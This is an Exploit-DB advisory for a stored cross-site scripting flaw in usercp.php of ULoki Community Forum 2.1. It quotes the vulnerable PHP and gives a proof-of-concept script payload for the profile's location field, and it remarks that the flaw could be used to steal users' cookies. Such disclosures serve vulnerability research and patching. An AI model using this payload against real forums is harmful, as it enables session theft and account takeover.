ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting

EDB-ID:

11385

CVE:

N/A

EDB Verified:

Author:

Sioma Labs

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-10

Vulnerable App:

# Exploit Title: ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting
# Date: 10/02/2010
# Author: Sioma Labs
# Software Link: http://www.uloki.com/download/uloki_forum_06_may_2009.zip
# Version: v2.1
# Tested on: Windows SP 2 / WAMP
# CVE : 
# Code : 

  ____  _                         _          _         
 / ___|(_) ___  _ __ ___   __ _  | |    __ _| |__  ___ 
 \___ \| |/ _ \| '_ ` _ \ / _` | | |   / _` | '_ \/ __|
  ___) | | (_) | | | | | | (_| | | |___ (_| | |_) \__ \
 |____/|_|\___/|_| |_| |_|\__,_| |_____\__,_|_.__/|___/
                                                       
 ======================================================


xSS Vuln Page

Vuln C0de (usercp.php) 
----------------------

$checke=$db->count_rows("SELECT email FROM b_users WHERE email='$email' AND userid='$user->userid'");
if($checke > 0)
{
print "</td></tr></table>";
$db->update_data("UPDATE b_users SET mb='$mb', location='$loc' WHERE userid='$user->userid'");
err_msg("User CP","Your information has been updated.");		
}

-----------------------

http://server/forum/usercp.php


POC
----

place this code on "location" 

"><script>alert(String.fromCharCode(88, 83, 83));</script>


--------------------------------------------------------


Note 
----

If an Attacker prefers the attacking process could be done by stealing cookies of other users  

-------------------------
Site: http://siomalabs.com
Author : Sioma Agent 154

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services